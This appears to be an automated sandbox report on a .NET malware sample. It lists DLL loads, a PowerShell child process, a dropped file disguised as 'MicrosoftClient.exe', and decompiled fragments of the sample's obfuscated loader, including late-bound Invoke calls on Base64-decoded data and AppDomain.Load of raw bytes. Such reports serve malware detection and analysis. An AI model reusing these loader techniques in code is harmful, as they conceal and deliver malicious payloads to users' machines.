Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 9RgE5uOJwX.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9RgE5uOJwX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
